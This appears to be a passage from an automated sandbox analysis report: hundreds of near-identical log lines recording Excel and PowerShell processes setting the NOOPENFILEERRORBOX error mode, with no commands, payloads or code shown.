Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX